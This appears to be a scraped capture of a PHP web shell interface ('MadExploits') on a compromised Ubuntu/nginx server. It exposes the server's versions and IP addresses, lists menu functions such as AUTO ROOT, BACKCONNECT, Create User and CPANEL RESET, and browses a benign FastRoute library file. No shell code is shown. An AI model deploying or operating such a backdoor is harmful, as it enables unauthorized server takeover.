Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
php /
FastRoute /
[ HOME SHELL ]
Name
Size
Permission
Action
DataGenerator
[ DIR ]
drwxr-xr-x
Dispatcher
[ DIR ]
drwxr-xr-x
RouteParser
[ DIR ]
drwxr-xr-x
BadRouteException.php
81
B
-rw-r--r--
DataGenerator.php
682
B
-rw-r--r--
Dispatcher.php
594
B
-rw-r--r--
Route.php
921
B
-rw-r--r--
RouteCollector.php
3.77
KB
-rw-r--r--
RouteParser.php
1.01
KB
-rw-r--r--
autoload.php
1.88
KB
-rw-r--r--
bootstrap.php
294
B
-rw-r--r--
functions.php
2.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RouteParser.php
<?php namespace FastRoute; interface RouteParser { /** * Parses a route string into multiple route data arrays. * * The expected output is defined using an example: * * For the route string "/fixedRoutePart/{varName}[/moreFixed/{varName2:\d+}]", if {varName} is interpreted as * a placeholder and [...] is interpreted as an optional route part, the expected result is: * * [ * // first route: without optional part * [ * "/fixedRoutePart/", * ["varName", "[^/]+"], * ], * // second route: with optional part * [ * "/fixedRoutePart/", * ["varName", "[^/]+"], * "/moreFixed/", * ["varName2", [0-9]+"], * ], * ] * * Here one route string was converted into two route data arrays. * * @param string $route Route string to parse * * @return mixed[][] Array of route data arrays */ public function parse($route); }
Close